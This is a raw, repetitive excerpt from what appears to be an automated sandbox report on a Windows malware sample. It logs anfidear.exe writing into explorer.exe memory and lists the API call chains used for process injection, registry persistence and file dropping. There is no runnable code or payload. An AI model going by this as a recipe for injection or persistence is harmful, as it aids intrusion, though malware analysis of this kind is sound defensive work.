Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10570000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10580000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10590000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 105A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 105B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 105C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 105D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 105E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 105F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10600000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10610000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10640000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10650000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10660000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10670000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10680000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10690000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 106A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 106B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 106C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 106D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 106E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 106F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10700000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10710000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10720000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10620000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10630000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10730000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10740000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10750000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10760000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10770000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10780000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10790000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 107A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 107B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 107C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 107D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 107E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 107F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10800000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10810000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10820000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10830000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10840000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10850000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10860000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10870000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10880000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10890000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 108A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 108B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 108C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 108D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 108E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 108F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10900000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10910000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10920000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10930000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10940000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10950000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10960000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10970000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10980000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10990000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 109A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 109B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 109C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 109D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E4C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 109E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 109F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10A00000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10A10000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10A20000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10A30000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10A40000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10A50000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10A60000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10A70000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10A80000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10A90000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10AA0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10AB0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10AC0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10AD0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10AE0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10AF0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10B00000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10B10000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10B20000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10B30000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10B40000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10B50000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10B60000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10B70000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10B80000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10B90000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10BA0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10BB0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10BC0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10BD0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10BE0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10BF0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10C00000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10C10000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10C20000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10C30000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10C40000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10C50000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10C60000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10C70000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10C80000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10CB0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10CC0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10CD0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10CE0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10CF0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10D00000Jump to behavior
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPa0_2_00403A19
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPa0_2_00403A19
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPa0_2_00403A19
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPa0_2_00403A19
Source: C:\Windows\SysWOW64\anfidear.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSe